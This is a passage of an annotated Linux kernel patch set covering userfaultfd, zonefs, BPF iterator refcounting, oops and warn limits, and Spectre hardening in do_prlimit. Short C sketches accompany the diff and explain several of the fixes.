+@@ -2038,7 +2038,7 @@ int attr_punch_hole(struct ntfs_inode *ni, u64 vbo, u64 bytes, u32 *frame_size)
+ 		return -ENOENT;
+ 
+ 	if (!attr_b->non_res) {
+-		u32 data_size = le32_to_cpu(attr->res.data_size);
++		u32 data_size = le32_to_cpu(attr_b->res.data_size);
+ 		u32 from, to;
+ 
+ 		if (vbo > data_size)
+diff --git a/fs/userfaultfd.c b/fs/userfaultfd.c
+index 98ac37e34e3d4..cc694846617a5 100644
+--- a/fs/userfaultfd.c
++++ b/fs/userfaultfd.c
+@@ -108,6 +108,21 @@ static bool userfaultfd_is_initialized(struct userfaultfd_ctx *ctx)
+ 	return ctx->features & UFFD_FEATURE_INITIALIZED;
+ }
+ 
++static void userfaultfd_set_vm_flags(struct vm_area_struct *vma,
++				     vm_flags_t flags)
++{
++	const bool uffd_wp_changed = (vma->vm_flags ^ flags) & VM_UFFD_WP;
++
++	vma->vm_flags = flags;
++	/*
++	 * For shared mappings, we want to enable writenotify while
++	 * userfaultfd-wp is enabled (see vma_wants_writenotify()). We'll simply
++	 * recalculate vma->vm_page_prot whenever userfaultfd-wp changes.
++	 */
++	if ((vma->vm_flags & VM_SHARED) && uffd_wp_changed)
++		vma_set_page_prot(vma);
++}
++
+ static int userfaultfd_wake_function(wait_queue_entry_t *wq, unsigned mode,
+ 				     int wake_flags, void *key)
+ {
+@@ -618,7 +633,8 @@ static void userfaultfd_event_wait_completion(struct userfaultfd_ctx *ctx,
+ 		for_each_vma(vmi, vma) {
+ 			if (vma->vm_userfaultfd_ctx.ctx == release_new_ctx) {
+ 				vma->vm_userfaultfd_ctx = NULL_VM_UFFD_CTX;
+-				vma->vm_flags &= ~__VM_UFFD_FLAGS;
++				userfaultfd_set_vm_flags(vma,
++							 vma->vm_flags & ~__VM_UFFD_FLAGS);
+ 			}
+ 		}
+ 		mmap_write_unlock(mm);
+@@ -652,7 +668,7 @@ int dup_userfaultfd(struct vm_area_struct *vma, struct list_head *fcs)
+ 	octx = vma->vm_userfaultfd_ctx.ctx;
+ 	if (!octx || !(octx->features & UFFD_FEATURE_EVENT_FORK)) {
+ 		vma->vm_userfaultfd_ctx = NULL_VM_UFFD_CTX;
+-		vma->vm_flags &= ~__VM_UFFD_FLAGS;
++		userfaultfd_set_vm_flags(vma, vma->vm_flags & ~__VM_UFFD_FLAGS);
+ 		return 0;
+ 	}
+ 
+@@ -733,7 +749,7 @@ void mremap_userfaultfd_prep(struct vm_area_struct *vma,
+ 	} else {
+ 		/* Drop uffd context if remap feature not enabled */
+ 		vma->vm_userfaultfd_ctx = NULL_VM_UFFD_CTX;
+-		vma->vm_flags &= ~__VM_UFFD_FLAGS;
++		userfaultfd_set_vm_flags(vma, vma->vm_flags & ~__VM_UFFD_FLAGS);
+ 	}
+ }
+ 
+@@ -895,7 +911,7 @@ static int userfaultfd_release(struct inode *inode, struct file *file)
+ 			prev = vma;
+ 		}
+ 
+-		vma->vm_flags = new_flags;
++		userfaultfd_set_vm_flags(vma, new_flags);
+ 		vma->vm_userfaultfd_ctx = NULL_VM_UFFD_CTX;
+ 	}
+ 	mmap_write_unlock(mm);
+@@ -1463,7 +1479,7 @@ static int userfaultfd_register(struct userfaultfd_ctx *ctx,
+ 		 * the next vma was merged into the current one and
+ 		 * the current one has not been updated yet.
+ 		 */
+-		vma->vm_flags = new_flags;
++		userfaultfd_set_vm_flags(vma, new_flags);
+ 		vma->vm_userfaultfd_ctx.ctx = ctx;
+ 
+ 		if (is_vm_hugetlb_page(vma) && uffd_disable_huge_pmd_share(vma))
+@@ -1651,7 +1667,7 @@ static int userfaultfd_unregister(struct userfaultfd_ctx *ctx,
+ 		 * the next vma was merged into the current one and
+ 		 * the current one has not been updated yet.
+ 		 */
+-		vma->vm_flags = new_flags;
++		userfaultfd_set_vm_flags(vma, new_flags);
+ 		vma->vm_userfaultfd_ctx = NULL_VM_UFFD_CTX;
+ 
+ 	skip:
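
Every place that used to assign vma->vm_flags directly now goes through
a setter that notices VM_UFFD_WP transitions and refreshes
vma->vm_page_prot for shared mappings. The XOR-based transition
detection in a minimal sketch; the flag values and recalc_page_prot()
are illustrative:

    #include <stdbool.h>
    #include <stdio.h>

    #define VM_SHARED  0x1u
    #define VM_UFFD_WP 0x2u

    struct vma { unsigned int flags; };

    static void recalc_page_prot(struct vma *vma)
    {
            puts("recomputing page protection");    /* expensive in the kernel */
    }

    /*
     * Central setter: detect a VM_UFFD_WP transition with XOR and
     * refresh derived state only when a shared mapping actually changed.
     */
    static void set_vm_flags(struct vma *vma, unsigned int flags)
    {
            bool wp_changed = (vma->flags ^ flags) & VM_UFFD_WP;

            vma->flags = flags;
            if ((vma->flags & VM_SHARED) && wp_changed)
                    recalc_page_prot(vma);
    }

    int main(void)
    {
            struct vma v = { .flags = VM_SHARED };

            set_vm_flags(&v, VM_SHARED | VM_UFFD_WP);  /* triggers recompute */
            set_vm_flags(&v, VM_SHARED | VM_UFFD_WP);  /* no change, silent */
            return 0;
    }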
+diff --git a/fs/zonefs/super.c b/fs/zonefs/super.c
+index 2c53fbb8d918e..a9c5c3f720adf 100644
+--- a/fs/zonefs/super.c
++++ b/fs/zonefs/super.c
+@@ -442,6 +442,10 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 			data_size = zonefs_check_zone_condition(inode, zone,
+ 								false, false);
+ 		}
++	} else if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_RO &&
++		   data_size > isize) {
++		/* Do not expose garbage data */
++		data_size = isize;
+ 	}
+ 
+ 	/*
+@@ -805,6 +809,24 @@ static ssize_t zonefs_file_dio_append(struct kiocb *iocb, struct iov_iter *from)
+ 
+ 	ret = submit_bio_wait(bio);
+ 
++	/*
++	 * If the file zone was written underneath the file system, the zone
++	 * write pointer may not be where we expect it to be, but the zone
++	 * append write can still succeed. So check manually that we wrote where
++	 * we intended to, that is, at zi->i_wpoffset.
++	 */
++	if (!ret) {
++		sector_t wpsector =
++			zi->i_zsector + (zi->i_wpoffset >> SECTOR_SHIFT);
++
++		if (bio->bi_iter.bi_sector != wpsector) {
++			zonefs_warn(inode->i_sb,
++				"Corrupted write pointer %llu for zone at %llu\n",
++				wpsector, zi->i_zsector);
++			ret = -EIO;
++		}
++	}
++
+ 	zonefs_file_write_dio_end_io(iocb, size, ret, 0);
+ 	trace_zonefs_file_dio_append(inode, size, ret);
+ 
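
The zonefs check recomputes where the zone-append should have landed,
zone start plus the file's write pointer offset in sectors, and compares
it with the sector the block layer reports back. The arithmetic in
isolation; function and parameter names are illustrative:

    #include <stdbool.h>
    #include <stdint.h>
    #include <stdio.h>

    #define SECTOR_SHIFT 9

    /*
     * After a zone-append completes, the device reports where the data
     * actually landed. Compare that with where the file system believes
     * the write pointer was; a mismatch means someone wrote to the zone
     * behind our back.
     */
    static bool append_landed_where_expected(uint64_t zone_start_sector,
                                             uint64_t file_wp_offset_bytes,
                                             uint64_t reported_sector)
    {
            uint64_t expected = zone_start_sector +
                                (file_wp_offset_bytes >> SECTOR_SHIFT);

            return reported_sector == expected;
    }

    int main(void)
    {
            /* zone at sector 1000, write pointer at byte 4096 -> sector 1008 */
            printf("%d\n", append_landed_where_expected(1000, 4096, 1008));
            return 0;
    }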
+diff --git a/include/linux/panic.h b/include/linux/panic.h
+index c7759b3f20452..979b776e3bcb3 100644
+--- a/include/linux/panic.h
++++ b/include/linux/panic.h
+@@ -11,6 +11,7 @@ extern long (*panic_blink)(int state);
+ __printf(1, 2)
+ void panic(const char *fmt, ...) __noreturn __cold;
+ void nmi_panic(struct pt_regs *regs, const char *msg);
++void check_panic_on_warn(const char *origin);
+ extern void oops_enter(void);
+ extern void oops_exit(void);
+ extern bool oops_may_print(void);
+diff --git a/include/linux/soc/ti/omap1-io.h b/include/linux/soc/ti/omap1-io.h
+index f7f12728d4a63..9a60f45899d3c 100644
+--- a/include/linux/soc/ti/omap1-io.h
++++ b/include/linux/soc/ti/omap1-io.h
+@@ -5,7 +5,7 @@
+ #ifndef __ASSEMBLER__
+ #include <linux/types.h>
+ 
+-#ifdef CONFIG_ARCH_OMAP1_ANY
++#ifdef CONFIG_ARCH_OMAP1
+ /*
+  * NOTE: Please use ioremap + __raw_read/write where possible instead of these
+  */
+@@ -15,7 +15,7 @@ extern u32 omap_readl(u32 pa);
+ extern void omap_writeb(u8 v, u32 pa);
+ extern void omap_writew(u16 v, u32 pa);
+ extern void omap_writel(u32 v, u32 pa);
+-#else
++#elif defined(CONFIG_COMPILE_TEST)
+ static inline u8 omap_readb(u32 pa)  { return 0; }
+ static inline u16 omap_readw(u32 pa) { return 0; }
+ static inline u32 omap_readl(u32 pa) { return 0; }
+diff --git a/include/linux/usb.h b/include/linux/usb.h
+index 9ff1ad4dfad12..6c95af3317f73 100644
+--- a/include/linux/usb.h
++++ b/include/linux/usb.h
+@@ -751,11 +751,14 @@ extern struct device *usb_intf_get_dma_device(struct usb_interface *intf);
+ extern int usb_acpi_set_power_state(struct usb_device *hdev, int index,
+ 	bool enable);
+ extern bool usb_acpi_power_manageable(struct usb_device *hdev, int index);
++extern int usb_acpi_port_lpm_incapable(struct usb_device *hdev, int index);
+ #else
+ static inline int usb_acpi_set_power_state(struct usb_device *hdev, int index,
+ 	bool enable) { return 0; }
+ static inline bool usb_acpi_power_manageable(struct usb_device *hdev, int index)
+ 	{ return true; }
++static inline int usb_acpi_port_lpm_incapable(struct usb_device *hdev, int index)
++	{ return 0; }
+ #endif
+ 
+ /* USB autosuspend and autoresume */
+diff --git a/include/trace/events/btrfs.h b/include/trace/events/btrfs.h
+index ed50e81174bf4..5e10b5b1d16c0 100644
+--- a/include/trace/events/btrfs.h
++++ b/include/trace/events/btrfs.h
+@@ -98,7 +98,7 @@ struct raid56_bio_trace_info;
+ 	EM( FLUSH_DELALLOC_WAIT,	"FLUSH_DELALLOC_WAIT")		\
+ 	EM( FLUSH_DELALLOC_FULL,	"FLUSH_DELALLOC_FULL")		\
+ 	EM( FLUSH_DELAYED_REFS_NR,	"FLUSH_DELAYED_REFS_NR")	\
+-	EM( FLUSH_DELAYED_REFS,		"FLUSH_ELAYED_REFS")		\
++	EM( FLUSH_DELAYED_REFS,		"FLUSH_DELAYED_REFS")		\
+ 	EM( ALLOC_CHUNK,		"ALLOC_CHUNK")			\
+ 	EM( ALLOC_CHUNK_FORCE,		"ALLOC_CHUNK_FORCE")		\
+ 	EM( RUN_DELAYED_IPUTS,		"RUN_DELAYED_IPUTS")		\
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index f2f9f174fc620..ab5ae475840f4 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -281,8 +281,12 @@ static int io_poll_check_events(struct io_kiocb *req, bool *locked)
+ 			 * to the waitqueue, so if we get nothing back, we
+ 			 * should be safe and attempt a reissue.
+ 			 */
+-			if (unlikely(!req->cqe.res))
++			if (unlikely(!req->cqe.res)) {
++				/* Multishot armed need not reissue */
++				if (!(req->apoll_events & EPOLLONESHOT))
++					continue;
+ 				return IOU_POLL_REISSUE;
++			}
+ 		}
+ 		if (req->apoll_events & EPOLLONESHOT)
+ 			return IOU_POLL_DONE;
+diff --git a/kernel/bpf/offload.c b/kernel/bpf/offload.c
+index 13e4efc971e6d..190d9f9dc9870 100644
+--- a/kernel/bpf/offload.c
++++ b/kernel/bpf/offload.c
+@@ -216,9 +216,6 @@ static void __bpf_prog_offload_destroy(struct bpf_prog *prog)
+ 	if (offload->dev_state)
+ 		offload->offdev->ops->destroy(prog);
+ 
+-	/* Make sure BPF_PROG_GET_NEXT_ID can't find this dead program */
+-	bpf_prog_free_id(prog, true);
+-
+ 	list_del_init(&offload->offloads);
+ 	kfree(offload);
+ 	prog->aux->offload = NULL;
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index 439ed7e5a82b8..6c61dba26f4d9 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -1958,7 +1958,7 @@ static void bpf_audit_prog(const struct bpf_prog *prog, unsigned int op)
+ 		return;
+ 	if (audit_enabled == AUDIT_OFF)
+ 		return;
+-	if (op == BPF_AUDIT_LOAD)
++	if (!in_irq() && !irqs_disabled())
+ 		ctx = audit_context();
+ 	ab = audit_log_start(ctx, GFP_ATOMIC, AUDIT_BPF);
+ 	if (unlikely(!ab))
+@@ -2053,6 +2053,7 @@ static void bpf_prog_put_deferred(struct work_struct *work)
+ 	prog = aux->prog;
+ 	perf_event_bpf_event(prog, PERF_BPF_EVENT_PROG_UNLOAD, 0);
+ 	bpf_audit_prog(prog, BPF_AUDIT_UNLOAD);
++	bpf_prog_free_id(prog, true);
+ 	__bpf_prog_put_noref(prog, true);
+ }
+ 
+@@ -2061,9 +2062,6 @@ static void __bpf_prog_put(struct bpf_prog *prog, bool do_idr_lock)
+ 	struct bpf_prog_aux *aux = prog->aux;
+ 
+ 	if (atomic64_dec_and_test(&aux->refcnt)) {
+-		/* bpf_prog_free_id() must be called first */
+-		bpf_prog_free_id(prog, do_idr_lock);
+-
+ 		if (in_irq() || irqs_disabled()) {
+ 			INIT_WORK(&aux->work, bpf_prog_put_deferred);
+ 			schedule_work(&aux->work);
+diff --git a/kernel/bpf/task_iter.c b/kernel/bpf/task_iter.c
+index c2a2182ce5702..c4ab9d6cdbe9c 100644
+--- a/kernel/bpf/task_iter.c
++++ b/kernel/bpf/task_iter.c
+@@ -438,6 +438,7 @@ struct bpf_iter_seq_task_vma_info {
+ 	 */
+ 	struct bpf_iter_seq_task_common common;
+ 	struct task_struct *task;
++	struct mm_struct *mm;
+ 	struct vm_area_struct *vma;
+ 	u32 tid;
+ 	unsigned long prev_vm_start;
+@@ -456,16 +457,19 @@ task_vma_seq_get_next(struct bpf_iter_seq_task_vma_info *info)
+ 	enum bpf_task_vma_iter_find_op op;
+ 	struct vm_area_struct *curr_vma;
+ 	struct task_struct *curr_task;
++	struct mm_struct *curr_mm;
+ 	u32 saved_tid = info->tid;
+ 
+ 	/* If this function returns a non-NULL vma, it holds a reference to
+-	 * the task_struct, and holds read lock on vma->mm->mmap_lock.
++	 * the task_struct, holds a refcount on mm->mm_users, and holds
++	 * read lock on vma->mm->mmap_lock.
+ 	 * If this function returns NULL, it does not hold any reference or
+ 	 * lock.
+ 	 */
+ 	if (info->task) {
+ 		curr_task = info->task;
+ 		curr_vma = info->vma;
++		curr_mm = info->mm;
+ 		/* In case of lock contention, drop mmap_lock to unblock
+ 		 * the writer.
+ 		 *
+@@ -504,13 +508,15 @@ task_vma_seq_get_next(struct bpf_iter_seq_task_vma_info *info)
+ 		 *    4.2) VMA2 and VMA2' covers different ranges, process
+ 		 *         VMA2'.
+ 		 */
+-		if (mmap_lock_is_contended(curr_task->mm)) {
++		if (mmap_lock_is_contended(curr_mm)) {
+ 			info->prev_vm_start = curr_vma->vm_start;
+ 			info->prev_vm_end = curr_vma->vm_end;
+ 			op = task_vma_iter_find_vma;
+-			mmap_read_unlock(curr_task->mm);
+-			if (mmap_read_lock_killable(curr_task->mm))
++			mmap_read_unlock(curr_mm);
++			if (mmap_read_lock_killable(curr_mm)) {
++				mmput(curr_mm);
+ 				goto finish;
++			}
+ 		} else {
+ 			op = task_vma_iter_next_vma;
+ 		}
+@@ -535,42 +541,47 @@ again:
+ 			op = task_vma_iter_find_vma;
+ 		}
+ 
+-		if (!curr_task->mm)
++		curr_mm = get_task_mm(curr_task);
++		if (!curr_mm)
+ 			goto next_task;
+ 
+-		if (mmap_read_lock_killable(curr_task->mm))
++		if (mmap_read_lock_killable(curr_mm)) {
++			mmput(curr_mm);
+ 			goto finish;
++		}
+ 	}
+ 
+ 	switch (op) {
+ 	case task_vma_iter_first_vma:
+-		curr_vma = find_vma(curr_task->mm, 0);
++		curr_vma = find_vma(curr_mm, 0);
+ 		break;
+ 	case task_vma_iter_next_vma:
+-		curr_vma = find_vma(curr_task->mm, curr_vma->vm_end);
++		curr_vma = find_vma(curr_mm, curr_vma->vm_end);
+ 		break;
+ 	case task_vma_iter_find_vma:
+ 		/* We dropped mmap_lock so it is necessary to use find_vma
+ 		 * to find the next vma. This is similar to the  mechanism
+ 		 * in show_smaps_rollup().
+ 		 */
+-		curr_vma = find_vma(curr_task->mm, info->prev_vm_end - 1);
++		curr_vma = find_vma(curr_mm, info->prev_vm_end - 1);
+ 		/* case 1) and 4.2) above just use curr_vma */
+ 
+ 		/* check for case 2) or case 4.1) above */
+ 		if (curr_vma &&
+ 		    curr_vma->vm_start == info->prev_vm_start &&
+ 		    curr_vma->vm_end == info->prev_vm_end)
+-			curr_vma = find_vma(curr_task->mm, curr_vma->vm_end);
++			curr_vma = find_vma(curr_mm, curr_vma->vm_end);
+ 		break;
+ 	}
+ 	if (!curr_vma) {
+ 		/* case 3) above, or case 2) 4.1) with vma->next == NULL */
+-		mmap_read_unlock(curr_task->mm);
++		mmap_read_unlock(curr_mm);
++		mmput(curr_mm);
+ 		goto next_task;
+ 	}
+ 	info->task = curr_task;
+ 	info->vma = curr_vma;
++	info->mm = curr_mm;
+ 	return curr_vma;
+ 
+ next_task:
+@@ -579,6 +590,7 @@ next_task:
+ 
+ 	put_task_struct(curr_task);
+ 	info->task = NULL;
++	info->mm = NULL;
+ 	info->tid++;
+ 	goto again;
+ 
+@@ -587,6 +599,7 @@ finish:
+ 		put_task_struct(curr_task);
+ 	info->task = NULL;
+ 	info->vma = NULL;
++	info->mm = NULL;
+ 	return NULL;
+ }
+ 
+@@ -658,7 +671,9 @@ static void task_vma_seq_stop(struct seq_file *seq, void *v)
+ 		 */
+ 		info->prev_vm_start = ~0UL;
+ 		info->prev_vm_end = info->vma->vm_end;
+-		mmap_read_unlock(info->task->mm);
++		mmap_read_unlock(info->mm);
++		mmput(info->mm);
++		info->mm = NULL;
+ 		put_task_struct(info->task);
+ 		info->task = NULL;
+ 	}
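
The task_vma iterator now pins the mm with its own reference
(get_task_mm()/mmput()) instead of reaching through curr_task->mm, so
the address space stays valid across the points where the mmap lock is
dropped and retaken. The underlying get/put pattern, reduced to C11
atomics; struct mm here is a toy stand-in, not the kernel's:

    #include <stdatomic.h>
    #include <stdlib.h>

    struct mm { atomic_int users; };

    /* Pin the object we are about to keep dereferencing. */
    static struct mm *mm_get(struct mm *mm)
    {
            atomic_fetch_add(&mm->users, 1);
            return mm;
    }

    /* Drop our pin; the last putter frees the object. */
    static void mm_put(struct mm *mm)
    {
            if (atomic_fetch_sub(&mm->users, 1) == 1)
                    free(mm);
    }

    int main(void)
    {
            struct mm *mm = calloc(1, sizeof(*mm));

            atomic_store(&mm->users, 1);    /* owner's initial reference */
            mm_get(mm);     /* iterator pins it */
            mm_put(mm);     /* owner exits... */
            mm_put(mm);     /* ...iterator's pin kept it valid until here */
            return 0;
    }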
+diff --git a/kernel/exit.c b/kernel/exit.c
+index 35e0a31a0315c..15dc2ec80c467 100644
+--- a/kernel/exit.c
++++ b/kernel/exit.c
+@@ -67,11 +67,58 @@
+ #include <linux/io_uring.h>
+ #include <linux/kprobes.h>
+ #include <linux/rethook.h>
++#include <linux/sysfs.h>
+ 
+ #include <linux/uaccess.h>
+ #include <asm/unistd.h>
+ #include <asm/mmu_context.h>
+ 
++/*
++ * The default value should be high enough not to take down a system that
++ * merely oopses from time to time, but low enough to not permit
++ * overflowing 32-bit refcounts or the ldsem writer count.
++ */
++static unsigned int oops_limit = 10000;
++
++#ifdef CONFIG_SYSCTL
++static struct ctl_table kern_exit_table[] = {
++	{
++		.procname       = "oops_limit",
++		.data           = &oops_limit,
++		.maxlen         = sizeof(oops_limit),
++		.mode           = 0644,
++		.proc_handler   = proc_douintvec,
++	},
++	{ }
++};
++
++static __init int kernel_exit_sysctls_init(void)
++{
++	register_sysctl_init("kernel", kern_exit_table);
++	return 0;
++}
++late_initcall(kernel_exit_sysctls_init);
++#endif
++
++static atomic_t oops_count = ATOMIC_INIT(0);
++
++#ifdef CONFIG_SYSFS
++static ssize_t oops_count_show(struct kobject *kobj, struct kobj_attribute *attr,
++			       char *page)
++{
++	return sysfs_emit(page, "%d\n", atomic_read(&oops_count));
++}
++
++static struct kobj_attribute oops_count_attr = __ATTR_RO(oops_count);
++
++static __init int kernel_exit_sysfs_init(void)
++{
++	sysfs_add_file_to_group(kernel_kobj, &oops_count_attr.attr, NULL);
++	return 0;
++}
++late_initcall(kernel_exit_sysfs_init);
++#endif
++
+ static void __unhash_process(struct task_struct *p, bool group_dead)
+ {
+ 	nr_threads--;
+@@ -884,6 +931,7 @@ void __noreturn make_task_dead(int signr)
+ 	 * Then do everything else.
+ 	 */
+ 	struct task_struct *tsk = current;
++	unsigned int limit;
+ 
+ 	if (unlikely(in_interrupt()))
+ 		panic("Aiee, killing interrupt handler!");
+@@ -897,6 +945,20 @@ void __noreturn make_task_dead(int signr)
+ 		preempt_count_set(PREEMPT_ENABLED);
+ 	}
+ 
++	/*
++	 * Every time the system oopses, if the oops happens while a reference
++	 * to an object was held, the reference leaks.
++	 * If the oops doesn't also leak memory, repeated oopsing can cause
++	 * reference counters to wrap around (if they're not using refcount_t).
++	 * This means that repeated oopsing can turn unexploitable-looking bugs
++	 * into exploitable ones.
++	 * To make sure this can't happen, place an upper bound on how often the
++	 * kernel may oops without panic().
++	 */
++	limit = READ_ONCE(oops_limit);
++	if (atomic_inc_return(&oops_count) >= limit && limit)
++		panic("Oopsed too often (kernel.oops_limit is %d)", limit);
++
+ 	/*
+ 	 * We're taking recursive faults here in make_task_dead. Safest is to just
+ 	 * leave this task alone and wait for reboot.
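
The oops accounting above is an always-incremented atomic counter
checked against a sysctl-controlled limit, with zero disabling the cap.
The same shape in userspace, with abort() standing in for panic(); the
limit value here is illustrative (the kernel defaults to 10000):

    #include <stdatomic.h>
    #include <stdio.h>
    #include <stdlib.h>

    static atomic_uint oops_count;
    static unsigned int oops_limit = 3;    /* 0 disables the cap */

    static void note_oops(void)
    {
            unsigned int limit = oops_limit;

            /* fetch_add returns the old value; +1 is the new count. */
            if (atomic_fetch_add(&oops_count, 1) + 1 >= limit && limit) {
                    fprintf(stderr, "oopsed too often (limit %u)\n", limit);
                    abort();    /* the kernel panics here */
            }
    }

    int main(void)
    {
            note_oops();
            note_oops();
            note_oops();    /* third call trips the limit and aborts */
            return 0;
    }

The trailing "&& limit" mirrors the patch: the counter always advances,
and a limit of zero never panics.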
+diff --git a/kernel/kcsan/report.c b/kernel/kcsan/report.c
+index 67794404042a5..e95ce7d7a76e7 100644
+--- a/kernel/kcsan/report.c
++++ b/kernel/kcsan/report.c
+@@ -492,8 +492,7 @@ static void print_report(enum kcsan_value_change value_change,
+ 	dump_stack_print_info(KERN_DEFAULT);
+ 	pr_err("==================================================================\n");
+ 
+-	if (panic_on_warn)
+-		panic("panic_on_warn set ...\n");
++	check_panic_on_warn("KCSAN");
+ }
+ 
+ static void release_report(unsigned long *flags, struct other_info *other_info)
+diff --git a/kernel/panic.c b/kernel/panic.c
+index da323209f5833..7834c9854e026 100644
+--- a/kernel/panic.c
++++ b/kernel/panic.c
+@@ -32,6 +32,7 @@
+ #include <linux/bug.h>
+ #include <linux/ratelimit.h>
+ #include <linux/debugfs.h>
++#include <linux/sysfs.h>
+ #include <trace/events/error_report.h>
+ #include <asm/sections.h>
+ 
+@@ -58,6 +59,7 @@ bool crash_kexec_post_notifiers;
+ int panic_on_warn __read_mostly;
+ unsigned long panic_on_taint;
+ bool panic_on_taint_nousertaint = false;
++static unsigned int warn_limit __read_mostly;
+ 
+ int panic_timeout = CONFIG_PANIC_TIMEOUT;
+ EXPORT_SYMBOL_GPL(panic_timeout);
+@@ -75,8 +77,9 @@ ATOMIC_NOTIFIER_HEAD(panic_notifier_list);
+ 
+ EXPORT_SYMBOL(panic_notifier_list);
+ 
+-#if defined(CONFIG_SMP) && defined(CONFIG_SYSCTL)
++#ifdef CONFIG_SYSCTL
+ static struct ctl_table kern_panic_table[] = {
++#ifdef CONFIG_SMP
+ 	{
+ 		.procname       = "oops_all_cpu_backtrace",
+ 		.data           = &sysctl_oops_all_cpu_backtrace,
+@@ -86,6 +89,14 @@ static struct ctl_table kern_panic_table[] = {
+ 		.extra1         = SYSCTL_ZERO,
+ 		.extra2         = SYSCTL_ONE,
+ 	},
++#endif
++	{
++		.procname       = "warn_limit",
++		.data           = &warn_limit,
++		.maxlen         = sizeof(warn_limit),
++		.mode           = 0644,
++		.proc_handler   = proc_douintvec,
++	},
+ 	{ }
+ };
+ 
+@@ -97,6 +108,25 @@ static __init int kernel_panic_sysctls_init(void)
+ late_initcall(kernel_panic_sysctls_init);
+ #endif
+ 
++static atomic_t warn_count = ATOMIC_INIT(0);
++
++#ifdef CONFIG_SYSFS
++static ssize_t warn_count_show(struct kobject *kobj, struct kobj_attribute *attr,
++			       char *page)
++{
++	return sysfs_emit(page, "%d\n", atomic_read(&warn_count));
++}
++
++static struct kobj_attribute warn_count_attr = __ATTR_RO(warn_count);
++
++static __init int kernel_panic_sysfs_init(void)
++{
++	sysfs_add_file_to_group(kernel_kobj, &warn_count_attr.attr, NULL);
++	return 0;
++}
++late_initcall(kernel_panic_sysfs_init);
++#endif
++
+ static long no_blink(int state)
+ {
+ 	return 0;
+@@ -199,6 +229,19 @@ static void panic_print_sys_info(bool console_flush)
+ 		ftrace_dump(DUMP_ALL);
+ }
+ 
++void check_panic_on_warn(const char *origin)
++{
++	unsigned int limit;
++
++	if (panic_on_warn)
++		panic("%s: panic_on_warn set ...\n", origin);
++
++	limit = READ_ONCE(warn_limit);
++	if (atomic_inc_return(&warn_count) >= limit && limit)
++		panic("%s: system warned too often (kernel.warn_limit is %d)",
++		      origin, limit);
++}
++
+ /**
+  *	panic - halt the system
+  *	@fmt: The text string to print
+@@ -617,8 +660,7 @@ void __warn(const char *file, int line, void *caller, unsigned taint,
+ 	if (regs)
+ 		show_regs(regs);
+ 
+-	if (panic_on_warn)
+-		panic("panic_on_warn set ...\n");
++	check_panic_on_warn("kernel");
+ 
+ 	if (!regs)
+ 		dump_stack();
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 172ec79b66f6c..f730b6fe94a7f 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -5778,8 +5778,7 @@ static noinline void __schedule_bug(struct task_struct *prev)
+ 		pr_err("Preemption disabled at:");
+ 		print_ip_sym(KERN_ERR, preempt_disable_ip);
+ 	}
+-	if (panic_on_warn)
+-		panic("scheduling while atomic\n");
++	check_panic_on_warn("scheduling while atomic");
+ 
+ 	dump_stack();
+ 	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
+diff --git a/kernel/sys.c b/kernel/sys.c
+index 5fd54bf0e8867..88b31f096fb2d 100644
+--- a/kernel/sys.c
++++ b/kernel/sys.c
+@@ -1442,6 +1442,8 @@ static int do_prlimit(struct task_struct *tsk, unsigned int resource,
+ 
+ 	if (resource >= RLIM_NLIMITS)
+ 		return -EINVAL;
++	resource = array_index_nospec(resource, RLIM_NLIMITS);
++
+ 	if (new_rlim) {
+ 		if (new_rlim->rlim_cur > new_rlim->rlim_max)
+ 			return -EINVAL;
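/*
 * The do_prlimit() hunk above is the standard Spectre-v1 hardening
 * pattern: bounds-check the index, then clamp it with array_index_nospec()
 * from <linux/nospec.h> so a mispredicted branch cannot speculate with an
 * out-of-range value. A kernel-style sketch of the pattern (illustrative
 * only; example_get() is a hypothetical helper, not from the patch):
 */
#include <linux/errno.h>
#include <linux/nospec.h>

static long example_get(const unsigned long *table, unsigned int idx,
			unsigned int size)
{
	if (idx >= size)
		return -EINVAL;
	idx = array_index_nospec(idx, size); /* clamped even under speculation */
	return table[idx];
}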
+diff --git a/lib/ubsan.c b/lib/ubsan.c
+index 36bd75e334263..60c7099857a05 100644
+--- a/lib/ubsan.c
++++ b/lib/ubsan.c
+@@ -154,8 +154,7 @@ static void ubsan_epilogue(void)
+ 
+ 	current->in_ubsan--;
+ 
+-	if (panic_on_warn)
+-		panic("panic_on_warn set ...\n");
++	check_panic_on_warn("UBSAN");
+ }
+ 
+ void __ubsan_handle_divrem_overflow(void *_data, void *lhs, void *rhs)
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index 9c251faeb6f59..52475c4262e45 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -94,6 +94,8 @@ static int hugetlb_acct_memory(struct hstate *h, long delta);
+ static void hugetlb_vma_lock_free(struct vm_area_struct *vma);
+ static void hugetlb_vma_lock_alloc(struct vm_area_struct *vma);
+ static void __hugetlb_vma_unlock_write_free(struct vm_area_struct *vma);
++static void hugetlb_unshare_pmds(struct vm_area_struct *vma,
++		unsigned long start, unsigned long end);
+ 
+ static inline bool subpool_is_free(struct hugepage_subpool *spool)
+ {
+@@ -4825,6 +4827,25 @@ static int hugetlb_vm_op_split(struct vm_area_struct *vma, unsigned long addr)
+ {
+ 	if (addr & ~(huge_page_mask(hstate_vma(vma))))
+ 		return -EINVAL;
++
++	/*
++	 * PMD sharing is only possible for PUD_SIZE-aligned address ranges
++	 * in HugeTLB VMAs. If we will lose PUD_SIZE alignment due to this
++	 * split, unshare PMDs in the PUD_SIZE interval surrounding addr now.
++	 */
++	if (addr & ~PUD_MASK) {
++		/*
++		 * hugetlb_vm_op_split is called right before we attempt to
++		 * split the VMA. We will need to unshare PMDs in the old and
++		 * new VMAs, so let's unshare before we split.
++		 */
++		unsigned long floor = addr & PUD_MASK;
++		unsigned long ceil = floor + PUD_SIZE;
++
++		if (floor >= vma->vm_start && ceil <= vma->vm_end)
++			hugetlb_unshare_pmds(vma, floor, ceil);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -6583,8 +6604,17 @@ unsigned long hugetlb_change_protection(struct vm_area_struct *vma,
+ 		spinlock_t *ptl;
